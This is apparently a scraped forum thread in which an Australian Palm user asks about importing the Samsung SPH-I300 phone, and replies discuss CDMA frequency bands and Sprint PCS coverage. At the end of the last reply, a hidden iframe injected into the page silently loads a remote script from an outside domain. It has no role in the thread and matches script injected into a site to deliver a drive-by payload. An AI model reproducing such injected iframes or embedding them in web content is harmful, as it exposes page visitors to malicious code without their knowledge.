I'm a longtime Palm user interested in obtaining a Palm/phone combo. The Kyocera QCP6035 is on sale in this country (Australia) but the Samsung SPH-I300 is not or at least I have not been able to find a distributor. I am just curious if there are any australian users of the I300 here and if so how you obtained it and what your experience has been.

As a CDMA phone it should be compatible with the Australian network, and I not aware of any other problems that should arise if I were to import one.

is sprint pcs in that neck of the woods?

this phone operates on the 1900mhz freq and 800 analog. if you dont have the 1900mhz pcs freq. then your out of luck... you could use it on the 800mhz but that wont be fun... also you wont be able to use te data services of this wonderful instrument...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
